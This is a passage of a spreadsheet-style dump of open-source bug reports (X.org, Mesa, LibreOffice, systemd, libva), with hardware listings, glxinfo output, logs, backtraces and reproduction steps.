        Flags: bus master 66MHz medium devsel latency 64 IRQ 22
        I/O ports at fa00 [size=8]
        I/O ports at f900 [size=4]
        I/O ports at f800 [size=8]
        I/O ports at f700 [size=4]
        I/O ports at f600 [size=16]
        Memory at fe02e000 (32-bit non-prefetchable) [size=512]
        [virtual] Expansion ROM at 40080000 [disabled] [size=512K]
        Capabilities: 
        Kernel driver in use: sata_sil
        Kernel modules: sata_sil
00:13.0 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller (rev
80) (prog-if 10 [OHCI])
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64 IRQ 19
        Memory at fe02d000 (32-bit non-prefetchable) [size=4K]
        Capabilities: 
        Kernel driver in use: ohci_hcd
        Kernel modules: ohci-hcd
00:13.1 USB Controller: ATI Technologies Inc IXP SB400 USB Host Controller (rev
80) (prog-if 10 [OHCI])
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64 IRQ 19
        Memory at fe02c000 (32-bit non-prefetchable) [size=4K]
        Capabilities: 
        Kernel driver in use: ohci_hcd
        Kernel modules: ohci-hcd
00:13.2 USB Controller: ATI Technologies Inc IXP SB400 USB2 Host Controller
(rev 80) (prog-if 20 [EHCI])
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64 IRQ 19
        Memory at fe02b000 (32-bit non-prefetchable) [size=4K]
        Capabilities: 
        Kernel driver in use: ehci_hcd
        Kernel modules: ehci-hcd
00:14.0 SMBus: ATI Technologies Inc IXP SB400 SMBus Controller (rev 82)
        Subsystem: Intel Corporation Unknown device d600
        Flags: 66MHz medium devsel
        I/O ports at 0b00 [size=16]
        Memory at fe02a000 (32-bit non-prefetchable) [size=1K]
        Kernel driver in use: piix4_smbus
        Kernel modules: i2c-piix4
00:14.1 IDE interface: ATI Technologies Inc Standard Dual Channel PCI IDE
Controller (rev 80) (prog-if 8a [Master SecP PriP])
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64 IRQ 16
        I/O ports at 01f0 [size=8]
        I/O ports at 03f4 [size=1]
        I/O ports at 0170 [size=8]
        I/O ports at 0374 [size=1]
        I/O ports at f400 [size=16]
        Capabilities: 
        Kernel driver in use: pata_atiixp
        Kernel modules: pata_atiixp
00:14.2 Audio device: ATI Technologies Inc SB450 HDA Audio (rev 01)
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master slow devsel latency 64 IRQ 16
        Memory at fe024000 (64-bit non-prefetchable) [size=16K]
        Capabilities: 
        Kernel driver in use: HDA Intel
        Kernel modules: snd-hda-intel
00:14.3 ISA bridge: ATI Technologies Inc IXP SB400 PCI-ISA Bridge (rev 80)
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 0
00:14.4 PCI bridge: ATI Technologies Inc IXP SB400 PCI-PCI Bridge (rev 80)
(prog-if 01 [Subtractive decode])
        Flags: bus master VGA palette snoop 66MHz medium devsel latency 64
        Bus: primary=00 secondary=02 subordinate=02 sec-latency=64
        I/O behind bridge: 0000d000-0000dfff
        Memory behind bridge: fdd00000-fddfffff
        Prefetchable memory behind bridge: fdc00000-fdcfffff
01:05.0 VGA compatible controller: ATI Technologies Inc RC410 [Radeon Xpress
200] (prog-if 00 [VGA controller])
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master 66MHz medium devsel latency 64 IRQ 17
        Memory at d8000000 (32-bit prefetchable) [size=128M]
        I/O ports at ee00 [size=256]
        Memory at fdef0000 (32-bit non-prefetchable) [size=64K]
        [virtual] Expansion ROM at fde00000 [disabled] [size=128K]
        Capabilities: 
        Kernel driver in use: radeon
02:02.0 Ethernet controller: Realtek Semiconductor Co. Ltd.
RTL-8139/8139C/8139C+ (rev 10)
        Subsystem: Intel Corporation Unknown device d600
        Flags: bus master medium devsel latency 64 IRQ 21
        I/O ports at de00 [size=256]
        Memory at fddff000 (32-bit non-prefetchable) [size=256]
        Capabilities: 
        Kernel driver in use: 8139too
        Kernel modules: 8139cp 8139too</t>
  </si>
  <si>
    <t>XORG-10274</t>
  </si>
  <si>
    <t>X(7) manpage doesn't document %D for environment variables</t>
  </si>
  <si>
    <t>Bug reported by Julian Gilbey on the Debian BTS 3 years ago.
The Xt library supports %D in XUSERFILESEARCHPATH and XAPPLRESDIR but
this is not documented in X(7). There's almost-appropriate text in the manpage of XtResolvePathname.
Brice</t>
  </si>
  <si>
    <t>YTSTENUT-46492</t>
  </si>
  <si>
    <t>Fixed API linking after salut and gabble refactoring</t>
  </si>
  <si>
    <t>Created attachment 57495
Fixed gabble linking
These 2 patches fix linking after the changes in Gabble and Salut</t>
  </si>
  <si>
    <t>ytstenut</t>
  </si>
  <si>
    <t>PYCAIRO-20674</t>
  </si>
  <si>
    <t>LinearGradient has no set_extend</t>
  </si>
  <si>
    <t>LinearGradient is a subclass of Pattern and should have the *_extend methods.</t>
  </si>
  <si>
    <t>turbo24prg</t>
  </si>
  <si>
    <t>MESA-20607</t>
  </si>
  <si>
    <t>FlightGear asserts and aborts in r300_mipmap_tree.c:calculate_miptree_layout</t>
  </si>
  <si>
    <t>FlightGear flight simulator asserts and aborts with the following error:
[muks@naina ~]$ fgfs
fgfs: r300_mipmap_tree.c:122: calculate_miptree_layout: Assertion `numLevels &lt;= 12' failed.
Aborted
[muks@naina ~]$ 
Compiz is not in use. This assert and abort is consistently reproducible every single time fgfs is run. This is on a fully up to date Fedora 10 x86_64 installation on a laptop with the ATI Radeon Mobility X1400 chipset. Package versions:
FlightGear-1.0.0-4.fc10.x86_64
xorg-x11-drv-ati-6.10.0-2.fc10.x86_64
mesa-libGL-7.2-0.15.fc10.x86_64
libdrm-2.4.0-0.21.fc10.x86_64
[muks@naina ~]$ glxinfo
name of display: :0.0
display: :0  screen: 0
direct rendering: Yes
server glx vendor string: SGI
server glx version string: 1.2
server glx extensions:
    GLX_ARB_multisample GLX_EXT_import_context GLX_EXT_texture_from_pixmap 
    GLX_EXT_visual_info GLX_EXT_visual_rating GLX_MESA_copy_sub_buffer 
    GLX_OML_swap_method GLX_SGI_swap_control GLX_SGIS_multisample 
    GLX_SGIX_fbconfig GLX_SGIX_visual_select_group
client glx vendor string: SGI
client glx version string: 1.4
client glx extensions:
    GLX_ARB_get_proc_address GLX_ARB_multisample GLX_EXT_import_context 
    GLX_EXT_visual_info GLX_EXT_visual_rating GLX_MESA_allocate_memory 
    GLX_MESA_copy_sub_buffer GLX_MESA_swap_control 
    GLX_MESA_swap_frame_usage GLX_OML_swap_method GLX_OML_sync_control 
    GLX_SGI_make_current_read GLX_SGI_swap_control GLX_SGI_video_sync 
    GLX_SGIS_multisample GLX_SGIX_fbconfig GLX_SGIX_pbuffer 
    GLX_SGIX_visual_select_group GLX_EXT_texture_from_pixmap
GLX version: 1.2
GLX extensions:
    GLX_ARB_get_proc_address GLX_ARB_multisample GLX_EXT_import_context 
    GLX_EXT_visual_info GLX_EXT_visual_rating GLX_MESA_swap_control 
    GLX_MESA_swap_frame_usage GLX_OML_swap_method GLX_SGI_swap_control 
    GLX_SGI_video_sync GLX_SGIS_multisample GLX_SGIX_fbconfig 
    GLX_SGIX_visual_select_group
OpenGL vendor string: DRI R300 Project
OpenGL renderer string: Mesa DRI R300 20060815 TCL
OpenGL version string: 1.3 Mesa 7.3-devel
OpenGL extensions:
    GL_ARB_depth_texture GL_ARB_fragment_program GL_ARB_imaging 
    GL_ARB_multisample GL_ARB_multitexture GL_ARB_point_parameters 
    GL_ARB_shadow GL_ARB_shadow_ambient GL_ARB_texture_border_clamp 
    GL_ARB_texture_compression GL_ARB_texture_cube_map 
    GL_ARB_texture_env_add GL_ARB_texture_env_combine 
    GL_ARB_texture_env_crossbar GL_ARB_texture_env_dot3 
    GL_MESAX_texture_float GL_ARB_texture_mirrored_repeat 
    GL_ARB_texture_rectangle GL_ARB_transpose_matrix 
    GL_ARB_vertex_buffer_object GL_ARB_vertex_program GL_ARB_window_pos 
    GL_EXT_abgr GL_EXT_bgra GL_EXT_blend_color 
    GL_EXT_blend_equation_separate GL_EXT_blend_func_separate 
    GL_EXT_blend_logic_op GL_EXT_blend_minmax GL_EXT_blend_subtract 
    GL_EXT_clip_volume_hint GL_EXT_compiled_vertex_array GL_EXT_convolution 
    GL_EXT_copy_texture GL_EXT_draw_range_elements 
    GL_EXT_gpu_program_parameters GL_EXT_histogram GL_EXT_multi_draw_arrays 
    GL_EXT_packed_pixels GL_EXT_point_parameters GL_EXT_polygon_offset 
    GL_EXT_rescale_normal GL_EXT_secondary_color 
    GL_EXT_separate_specular_color GL_EXT_shadow_funcs 
    GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_subtexture 
    GL_EXT_texture GL_EXT_texture3D GL_EXT_texture_edge_clamp 
    GL_EXT_texture_env_add GL_EXT_texture_env_combine 
    GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic 
    GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp 
    GL_EXT_texture_object GL_EXT_texture_rectangle GL_EXT_vertex_array 
    GL_APPLE_packed_pixels GL_ATI_blend_equation_separate 
    GL_ATI_texture_env_combine3 GL_ATI_texture_mirror_once 
    GL_IBM_rasterpos_clip GL_IBM_texture_mirrored_repeat 
    GL_INGR_blend_func_separate GL_MESA_pack_invert GL_MESA_ycbcr_texture 
    GL_MESA_window_pos GL_NV_blend_square GL_NV_light_max_exponent 
    GL_NV_texture_rectangle GL_NV_texgen_reflection GL_NV_vertex_program 
    GL_OES_read_format GL_SGI_color_matrix GL_SGI_color_table 
    GL_SGIS_generate_mipmap GL_SGIS_texture_border_clamp 
    GL_SGIS_texture_edge_clamp GL_SGIS_texture_lod GL_SGIX_depth_texture 
    GL_SGIX_shadow_ambient GL_SUN_multi_draw_arrays
16 GLX Visuals
   visual  x  bf lv rg d st colorbuffer ax dp st accumbuffer  ms  cav
 id dep cl sp sz l  ci b ro  r  g  b  a bf th cl  r  g  b  a ns b eat
----------------------------------------------------------------------
0x69 24 tc  0 32  0 r  .  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x6a 24 tc  0 32  0 r  .  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x6b 24 tc  0 32  0 r  y  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x6c 24 tc  0 32  0 r  y  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x6d 24 tc  0 32  0 r  .  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x6e 24 tc  0 32  0 r  .  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
0x6f 24 tc  0 32  0 r  y  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x70 24 tc  0 32  0 r  y  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
0x71 24 dc  0 32  0 r  .  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x72 24 dc  0 32  0 r  .  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x73 24 dc  0 32  0 r  y  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x74 24 dc  0 32  0 r  y  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x75 24 dc  0 32  0 r  .  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x76 24 dc  0 32  0 r  .  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
0x77 24 dc  0 32  0 r  y  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x78 24 dc  0 32  0 r  y  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
16 GLXFBConfigs:
   visual  x  bf lv rg d st colorbuffer ax dp st accumbuffer  ms  cav
 id dep cl sp sz l  ci b ro  r  g  b  a bf th cl  r  g  b  a ns b eat
----------------------------------------------------------------------
0x59  0 tc  0 32  0 r  .  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x5a  0 tc  0 32  0 r  .  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x5b  0 tc  0 32  0 r  y  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x5c  0 tc  0 32  0 r  y  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x5d  0 tc  0 32  0 r  .  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x5e  0 tc  0 32  0 r  .  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
0x5f  0 tc  0 32  0 r  y  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x60  0 tc  0 32  0 r  y  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
0x61  0 dc  0 32  0 r  .  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x62  0 dc  0 32  0 r  .  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x63  0 dc  0 32  0 r  y  .  8  8  8  8  0 24  0  0  0  0  0  0 0 None
0x64  0 dc  0 32  0 r  y  .  8  8  8  8  0 24  0 16 16 16 16  0 0 Slow
0x65  0 dc  0 32  0 r  .  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x66  0 dc  0 32  0 r  .  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
0x67  0 dc  0 32  0 r  y  .  8  8  8  8  0 24  8  0  0  0  0  0 0 None
0x68  0 dc  0 32  0 r  y  .  8  8  8  8  0 24  8 16 16 16 16  0 0 Slow
[muks@naina ~]$</t>
  </si>
  <si>
    <t>muks</t>
  </si>
  <si>
    <t>XORG-81142</t>
  </si>
  <si>
    <t>xserver 1.15.99.904: Error config_odev_get_int_attribute called for non integer attrib 4</t>
  </si>
  <si>
    <t>After installing X Server 1.15.99.904 (1.16.0 RC 4) I get the following error in
Xorg.0.log:
---
X.Org X Server 1.15.99.904 (1.16.0 RC 4)
Release Date: 2014-07-07
[    38.415] X Protocol Version 11 Revision 0
[    38.415] Build Operating System: Linux 3.15-3.dmz.1-liquorix-amd64 x86_64 
[    38.415] Current Operating System: Linux debian 3.15-3.dmz.1-liquorix-amd64 #1 ZEN SMP PREEMPT Sat Jul 5 21:18:05 UTC 2014 x86_64
[    38.415] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-3.15-3.dmz.1-liquorix-amd64 root=UUID=6358264e-67bc-4443-a14d-eb08d628aaae ro upgrade-from-grub-legacy vga=769 hpet=disable idle=mwait ignore-evdev nothreadirqs quiet logo.nologo splash rootfstype=ext4 transparent_hugepage=always radeon.dpm=1 radeon.gartsize=1024 zswap.enabled=1 apparmor=1 security=apparmor init=/sbin/init
[    38.415] Build Date: 10 July 2014  11:06:53AM
[    38.415]  
[    38.415] Current version of pixman: 0.32.6
.....
[    38.454] (II) [KMS] Kernel modesetting enabled.
[    38.454] (==) RADEON(0): Depth 24 (--) framebuffer bpp 32
[    38.454] (II) RADEON(0): Pixel depth = 24 bits stored in 4 bytes (32 bpp pixmaps)
[    38.454] (==) RADEON(0): Default visual is TrueColor
[    38.454] (==) RADEON(0): RGB weight 888
[    38.454] (II) RADEON(0): Using 8 bits per RGB (8 bit DAC)
[    38.454] (--) RADEON(0): Chipset: ATI Radeon HD 3200 Graphics (ChipID = 0x9612)
[    38.454] (EE) Error config_odev_get_int_attribute called for non integer attrib 4
-----
No such error using X Server 1.15.99.903 (1.16.0 RC 3)</t>
  </si>
  <si>
    <t>LIBVA-88513</t>
  </si>
  <si>
    <t>Firefox crashes when playing h264 video</t>
  </si>
  <si>
    <t>Created attachment 112361
FF backtrace
With libva-intel-driver-1.4.1-1.fc21.i686 installed FF crashes when playing
youtube html5 video or sample file
http://techslides.com/demos/sample-videos/small.mp4 (from
http://techslides.com/sample-webm-ogg-and-mp4-video-files-for-html5). It does
not crash if I uninstall either libva-intel-driver or gstreamer1-vaapi.
Video is Intel 945GM:
Display controller: Intel Corporation Mobile 945GM/GMS/GME 943/940GML Express
Integrated Graphics Controller (rev 03)
Backtrace attached.</t>
  </si>
  <si>
    <t>nerijus</t>
  </si>
  <si>
    <t>LIBREOFFICE-68956</t>
  </si>
  <si>
    <t>FORMULAEDITOR: Formulas get destroyed after file reload</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. Put in a Formula like +
2. Replace  by ABC
3. Save the document
4. Reopen it. The formula is now: {+func ABC}
Current behavior:
Formula after reload: {+func ABC}
Expected behavior:
Formula after reload: +ABC
Doesn't work:
Version: 4.2.0.0.alpha0+
Build ID: a8865e5df62b5f33aa769d459b9823eb5b110d4b
TinderBox: Win-x86@6-debug Branch:master Time: 2013-09-03_14:36:22
Works:
Version: 4.1.1.2
Build ID: 7e4286b58adc75a14f6d83f53a03b6c11fa2903
Operating System: All
Version: 4.2.0.0.alpha0+ Master
Last worked in: 4.1.2.1 rc</t>
  </si>
  <si>
    <t>XORG-1739</t>
  </si>
  <si>
    <t>App/xmodmap</t>
  </si>
  <si>
    <t>xmodmap prints incorrect line numbers in error messages</t>
  </si>
  <si>
    <t>[Originally reported to Sun as Solaris bug id #4637857]
xmodmap prints line numbers which are one too low in error messages:
$ echo foo &gt;bar
$ xmodmap bar
xmodmap:  unknown command on line bar:0
xmodmap:  1 error encountered aborting.
It obviously starts line number with 0 internally but should start with 1.</t>
  </si>
  <si>
    <t>XORG-21738</t>
  </si>
  <si>
    <t>Attempting to Xv into offscreen GLXPixmap for GLX_EXT_texture_from_pixmap hangs GPU</t>
  </si>
  <si>
    <t>I've found a repeatable method to hang the GPU on my 945GME using the latest git head of xf86-video-intel mesa libdrm xorg-server and the assorted current git versions of their dependencies that are needed in order to compile them (for instance libXi which is a minor detail I think to be irrelevant to this report).
In the stock xorg-server the action of using Xv to convert YUV into RGB onto an X11 off-screen Pixmap is an invalid operation. So I also applied the patch from Bug Report #21143 in order to allow this operation to be attempted.
What I do is set up an XvImage object to contain the YUV image and then allocate an off-screen Pixmap object to receive it. Prior to the transfer I use the features in the GLX_EXT_texture_from_pixmap to build a GLXPixmap object that refers to this offscreen pixmap. I then bind this to a texture and then proceed to run a loop where I blit the texture to the screen using GL_QUADS modify the XvImage rerun the XvPutImage and then attempt to re-blit.
The Xorg server hangs (inside the kernel ioctl) presumably waiting for the card to complete an action. The hang occurs at the point where the application calls glXSwapBuffers(). I am using libSDL-1.2.13 which wraps this inside of SDL_GL_SwapBuffers().
Here's the X server's stack:
(gdb) bt
#0  0xb7dab9e0 in ioctl () from /lib/libc.so.0
#1  0xb7d056b1 in drmIoctl (fd=8 request=25688 arg=0x0) at xf86drm.c:187
#2  0xb7d0948a in drmCommandNone (fd=8 drmCommandIndex=24) at xf86drm.c:2313
#3  0xb7c92321 in I830BlockHandler (i=0 blockData=0x0 pTimeout=0xbf9c36f4 pReadmask=0x823a800) at i830_driver.c:2232
#4  0x081f796d in AnimCurScreenBlockHandler (screenNum=0 blockData=0x0 pTimeout=0xbf9c36f4 pReadmask=0x823a800)
    at animcur.c:222
#5  0x080fe220 in compBlockHandler (i=0 blockData=0x0 pTimeout=0xbf9c36f4 pReadmask=0x823a800) at compinit.c:159
#6  0x08078071 in BlockHandler (pTimeout=0xbf9c36f4 pReadmask=0x823a800) at dixutils.c:379
#7  0x080b02b8 in WaitForSomething (pClientsReady=0x834f648) at WaitFor.c:215
#8  0x0806a485 in Dispatch () at dispatch.c:362
#9  0x08063bb1 in main (argc=4 argv=0xbf9c38e4 envp=0xbf9c38f8) at main.c:283
Here's the associated kernel stack:
cat 1218/stack 
[] i915_wait_request+0x121/0x180
[] i915_gem_throttle_ioctl+0x35/0x50
[] drm_ioctl+0x125/0x360
[] vfs_ioctl+0x6b/0x80
[] do_vfs_ioctl+0x2c8/0x4f0
[] sys_ioctl+0x39/0x60
[] syscall_call+0x7/0xb
[] 0xffffffff
Here's the stack trace from my program:
#0  0xb769fd62 in select () from /lib/libc.so.0
#1  0xb7e766c5 in _xcb_conn_wait (c=0x805cf48 cond=0xbf8fa2a8 vector=0x0 count=0x0) at xcb_conn.c:283
#2  0xb7e77fbd in xcb_wait_for_reply (c=0x805cf48 request=52 e=0xbf8fa308) at xcb_in.c:376
#3  0xb7edc8dd in _XReply (dpy=0x80550a8 rep=0xbf8fa334 extra=0 discard=1) at xcb_io.c:454
#4  0xb7687d05 in XFixesExtAddDisplay (extinfo=0xb768970c dpy=0x80550a8 ext_name=0xb76896e8 XFIXES) at Xfixes.c:85
#5  0xb7688092 in XFixesFindDisplay (dpy=0x80550a8) at Xfixes.c:201
#6  0xb7685d71 in XFixesCreateRegion (dpy=0x80550a8 rectangles=0xbf8fa3f4 nrectangles=1) at Region.c:33
#7  0xb797125e in dri2CopySubBuffer (pdraw=0x84039b0 x=0 y=0 width=1280 height=800) at dri2_glx.c:213
#8  0xb79712f2 in dri2SwapBuffers (pdraw=0x84039b0) at dri2_glx.c:224
#9  0xb7937d61 in glXSwapBuffers (dpy=0x80550a8 drawable=6291471) at glxcmds.c:890
#10 0xb7b44245 in X11_GL_SwapBuffers (this=0x80584d0) at ./src/video/x11/SDL_x11gl.c:428
#11 0xb7b2cd7c in SDL_GL_SwapBuffers () at ./src/video/SDL_video.c:1515
#12 0x0804a748 in main (argc=2 argv=0xbf8fa6e4) at GLExtTest.cpp:347
I did get an intel_gpu_dump of the GPU which I am attaching to this issue.
The email on intel-gfx below alludes to virtual beverages for such output:
  * http://lists.freedesktop.org/archives/intel-gfx/2009-April/002104.html</t>
  </si>
  <si>
    <t>ckane</t>
  </si>
  <si>
    <t>XORG-17465</t>
  </si>
  <si>
    <t>Configured external monitor causes sig11 when not connected</t>
  </si>
  <si>
    <t>Created attachment 18712
Log of the crash
Recently I've been noticing that X crashes on start-up when I have a monitor configured on VGA_1  but it is not connected. If I comment out the configuration line or connect the monitor X starts just fine.
I'm not sure when this first started happening as I have not been using a multi-monitor setup recently. Sorry I can't be more help in that regard.
I'm using git master (commit f1c6cc86) X Server 1.4.99.906 (1.5.0 RC 6) on Gentoo Linux</t>
  </si>
  <si>
    <t>sparkybluefang</t>
  </si>
  <si>
    <t>LIBREOFFICE-36990</t>
  </si>
  <si>
    <t>Required installation space not visible when installing in german language!</t>
  </si>
  <si>
    <t>Using German as installation-language the required space used for installation is not visible/readable for the installation groups as it is cut away.
When manual installing LibOff you can choose what component you want to install. If you have german as instalation language the size of the space that will be used is not visible/seeable for chapters/groups as it is cut away because there is not enough space provided for the entire sentence that is showing that number.
Having the cursor on a line with a separate component you can read: Diese Komponente erfordert 4580KB auf Ihrer Festplatte.
So far no problem. But when you go to the entire group (with all the components inside you can read: Diese Komponente erfordert 0KB auf Ihrer Festplatte. Es wurden 6 von 6 Komponenten ausgewÃ¤hlt. Die Subkomponenten erfordern 48...
That's all you can read. You can have there 480MB of space needed or 48MB - you won't see it! No complete number no unit - just two digits of a number without unit - and you don't know how big that number might be you even don't know how many digits that number might have. You would have to calculate manually the total with the size of each component.
But when we ar at that chapter: There should also be a complete group so that it is possible to see the entire space that the whole installation will need (not only the separate component groups).
Now you can see:
- Program modules: 20...
- Optional components: 22...
- Language packages: 48...
But where is the total of all that?
Total is missing!
Another thing is: why tell that a component uses 0KB when you have your cursor-line at a group? You did not select a separate component why to tell that the component uses 0KB? If you leave that away there would be room for the used space.
To reproduce that problem: take any german-language WindowsXP and install LibreOffice. Don't choose the typical but the customized installation (Angepasst).
And if that problem exists in one language version (here: german) please check also all other language versions. Thanks!</t>
  </si>
  <si>
    <t>voltaire</t>
  </si>
  <si>
    <t>SYSTEMD-89370</t>
  </si>
  <si>
    <t>systemd-networkd-wait-online -i  stopped working</t>
  </si>
  <si>
    <t>I have a container that is has its network setup by the host using
ExecStartPre=/usr/bin/ip netns add %i
ExecStartPre=/usr/bin/ip link add $host type veth peer name $peer
ExecStartPre=/usr/bin/ip link set %i $host master $bridge
ExecStartPre=/usr/bin/ip link set $peer netns %i
ExecStartPre=/usr/bin/ip netns exec %i ip link set lo up
ExecStartPre=/usr/bin/ip netns exec %i ip addr add $addr dev $peer
ExecStartPre=/usr/bin/ip netns exec %i ip -6 route add default via $target
ExecStartPre=/usr/bin/ip netns exec %i ip link set $peer up
ExecStartPre=/usr/bin/ip link set $host up
ExecStart=/usr/bin/ip netns exec %i /usr/bin/systemd-nspawn --quiet --boot --keep-unit --link-journal=guest --directory=/jail/%i
in the container I see:
ifconfig -a
lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 0  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
vhost0: flags=4163  mtu 1500
        inet6 fe80::1472:6fff:fe24:72df  prefixlen 64  scopeid 0x20
        inet6 2001:4830:1100:8074::a  prefixlen 64  scopeid 0x0
        ether 16:72:6f:24:72:df  txqueuelen 1000  (Ethernet)
        RX packets 18592  bytes 2087500 (1.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 408  bytes 41333 (40.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
but
systemd-networkd-wait-online -i vhost0
hangs.
strace shows:timerfd_create(CLOCK_MONOTONIC 0x80800 /* TFD_??? */) = 7
epoll_ctl(3 EPOLL_CTL_ADD 7 {EPOLLIN {u32=3 u64=3}}) = 0
sendto(6  \0\0\0\22\0\5\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 32 0 {sa_family=AF_NETLINK pid=0 groups=00000000} 16) = 2
recvmsg(6 {msg_name(0)=NULL msg_iov(1)=[{NULL 0}] msg_controllen=56 {cmsg_len=20 cmsg_level=0x10e /* SOL_??? */ cmsg_type= ...} ms2
recvmsg(6 {msg_name(0)=NULL msg_iov(1)=[{x\4\0\0\20\0\2\0\0\0\0\0\251\0\0\0\0\0\4\3\1\0\0\0I\0\1\0\0\0\0\0... 4624}] msg_controllen=52
recvmsg(6 {msg_name(0)=NULL msg_iov(1)=[{NULL 0}] msg_controllen=56 {cmsg_len=20 cmsg_level=0x10e /* SOL_??? */ cmsg_type= ...} ms0
recvmsg(6 {msg_name(0)=NULL msg_iov(1)=[{\24\0\0\0\3\0\2\0\0\0\0\0\251\0\0\0\0\0\0\0 4624}] msg_controllen=56 {cmsg_len=20 cmsg_lev0
gettid()                                = 169
syscall_318(0x7fe86e6188c0 0x10 0x1 0x30 0x7fffaec69900 0x7fe86ecb0260) = 0x10
open(/run/systemd/netif/links/4 O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open(/run/systemd/netif/links/4 O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open(/run/systemd/netif/links/1 O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
open(/run/systemd/netif/links/1 O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
writev(2 [{ignore irrelevant link: lo 26} {\n 1}] 2ignore irrelevant link: lo
) = 27
epoll_ctl(3 EPOLL_CTL_MOD 6 {EPOLLIN {u32=1858799968 u64=140636267940192}}) = 0
epoll_wait(3
and the command hangs forever.
This was working in previous versons.
I am running an up to date arch install (218-2) with a 3.18-7 kernel.
Something changed breaking a working setup.  
Ed Tomlinson</t>
  </si>
  <si>
    <t>edt</t>
  </si>
  <si>
    <t>MESA-30403</t>
  </si>
  <si>
    <t>[softpipe] piglit texwrap 1d-rgb565 regression</t>
  </si>
  <si>
    <t>Created attachment 38985
texwrap.png
mesa: 99c422ef5ab3924aad66af026945f491d75d226f (master)
$ ./bin/texwrap -1d-rgb565-
Parameter: -1d-rgb565-
Using TEXTURE_1D.
RGB565 is R5G6B5A0. The internal format is 0x8050.
Using RGB565.
Testing NEAREST: REPEAT
Testing NEAREST: CLAMP
Testing NEAREST: CLAMP_TO_EDGE
Testing NEAREST: CLAMP_TO_BORDER
Testing NEAREST: MIRRORED_REPEAT
Testing NEAREST: MIRROR_CLAMP_EXT
Testing NEAREST: MIRROR_CLAMP_TO_EDGE_EXT
Testing NEAREST: MIRROR_CLAMP_TO_BORDER_EXT
Testing LINEAR: REPEAT
Testing LINEAR: CLAMP
Testing LINEAR: CLAMP_TO_EDGE
Testing LINEAR: CLAMP_TO_BORDER
Testing LINEAR: MIRRORED_REPEAT
Testing LINEAR: MIRROR_CLAMP_EXT
Testing LINEAR: MIRROR_CLAMP_TO_EDGE_EXT
Testing LINEAR: MIRROR_CLAMP_TO_BORDER_EXT
Testing NEAREST with projective mapping: REPEAT
Testing NEAREST with projective mapping: CLAMP
Testing NEAREST with projective mapping: CLAMP_TO_EDGE
Testing NEAREST with projective mapping: CLAMP_TO_BORDER
Testing NEAREST with projective mapping: MIRRORED_REPEAT
Testing NEAREST with projective mapping: MIRROR_CLAMP_EXT
Testing NEAREST with projective mapping: MIRROR_CLAMP_TO_EDGE_EXT
Testing NEAREST with projective mapping: MIRROR_CLAMP_TO_BORDER_EXT
Testing LINEAR with projective mapping: REPEAT
Testing LINEAR with projective mapping: CLAMP
Testing LINEAR with projective mapping: CLAMP_TO_EDGE
Testing LINEAR with projective mapping: CLAMP_TO_BORDER
Testing LINEAR with projective mapping: MIRRORED_REPEAT
Testing LINEAR with projective mapping: MIRROR_CLAMP_EXT
Testing LINEAR with projective mapping: MIRROR_CLAMP_TO_EDGE_EXT
Testing LINEAR with projective mapping: MIRROR_CLAMP_TO_BORDER_EXT
Testing NEAREST with swizzling: REPEAT
Testing NEAREST with swizzling: CLAMP
Testing NEAREST with swizzling: CLAMP_TO_EDGE
Testing NEAREST with swizzling: CLAMP_TO_BORDER
Probe at (27336) @ 00
  Expected: 127 0 255
  Observed: 0 255 128
